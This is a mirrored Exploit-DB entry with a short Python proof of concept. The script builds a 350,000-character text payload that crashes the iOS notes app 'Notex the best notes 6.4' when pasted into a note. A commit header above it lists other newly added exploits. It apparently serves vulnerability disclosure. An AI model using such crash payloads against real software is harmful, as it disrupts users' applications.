exploit-db-mirror/exploits/ios/dos/50003.py
Offensive Security fe5d7c9048 DB: 2021-06-15
16 changes to exploits/shellcodes

Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
Post-it 5.0.1 - Denial of Service (PoC)
Notex the best notes 6.4 - Denial of Service (PoC)
Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path
WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path
Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path
Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)
Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
GLPI 9.4.5 - Remote Code Execution (RCE)
COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)
Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)
Small CRM 3.0 - 'Authentication Bypass' SQL Injection
TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)
2021-06-15 05:01:55 +00:00

36 lines
No EOL
997 B
Python
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217
# Version: 6.4
# Category: DoS (iOS)
##### Vulnerability #####
Notex the best notes is vulnerable to a DoS condition when a long list of
characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")